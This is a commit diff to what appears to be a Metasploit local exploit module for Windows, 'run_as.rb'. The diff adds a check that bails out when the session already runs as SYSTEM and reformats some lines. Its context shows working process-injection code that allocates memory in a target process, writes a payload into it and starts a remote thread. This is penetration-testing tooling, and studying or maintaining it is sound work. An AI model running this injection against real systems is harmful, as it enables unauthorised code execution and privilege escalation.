Bail out as SYSTEM

modules/exploits/windows/local/run_as.rb

@@ -8,6 +8,7 @@ require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   include Msf::Post::Windows::Runas
+  include Msf::Post::Windows::Priv
 
   def initialize(info = {})
     super(update_info(info,
@@ -49,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def exploit
     fail_with(Exploit::Failure::BadConfig, 'Must be a meterpreter session') unless session.type == 'meterpreter'
-
+    fail_with(Exploit::Failure::NoAccess, 'Cannot use this technique as SYSTEM') if is_system?
     domain = datastore['DOMAIN']
     user = datastore['USER']
     password = datastore['PASSWORD']
@@ -83,6 +84,7 @@ class Metasploit3 < Msf::Exploit::Local
 
       vprint_status('Injecting payload into target process')
       raw = payload.encoded
+
       process_handle = pi[:process_handle]
 
       virtual_alloc = session.railgun.kernel32.VirtualAllocEx(process_handle,
@@ -95,21 +97,21 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Exploit::Failure::Unknown, "Unable to allocate memory in target process: #{virtual_alloc['ErrorMessage']}") if address == 0
 
       write_memory = session.railgun.kernel32.WriteProcessMemory(process_handle,
-                                                                 address,
-                                                                 raw,
-                                                                 raw.length,
-                                                                 4)
+                                                                address,
+                                                                raw,
+                                                                raw.length,
+                                                                4)
 
       fail_with(Exploit::Failure::Unknown,
                 "Unable to write memory in target process @ 0x#{address.to_s(16)}: #{write_memory['ErrorMessage']}") unless write_memory['return']
 
       create_remote_thread = session.railgun.kernel32.CreateRemoteThread(process_handle,
-                                                                         nil,
-                                                                         0,
-                                                                         address,
-                                                                         nil,
-                                                                         0,
-                                                                         4)
+                                                                        nil,
+                                                                        0,
+                                                                        address,
+                                                                        nil,
+                                                                        0,
+                                                                        4)
       if create_remote_thread['return'] == 0
         print_error("Unable to create remote thread in target process: #{create_remote_thread['ErrorMessage']}")
       else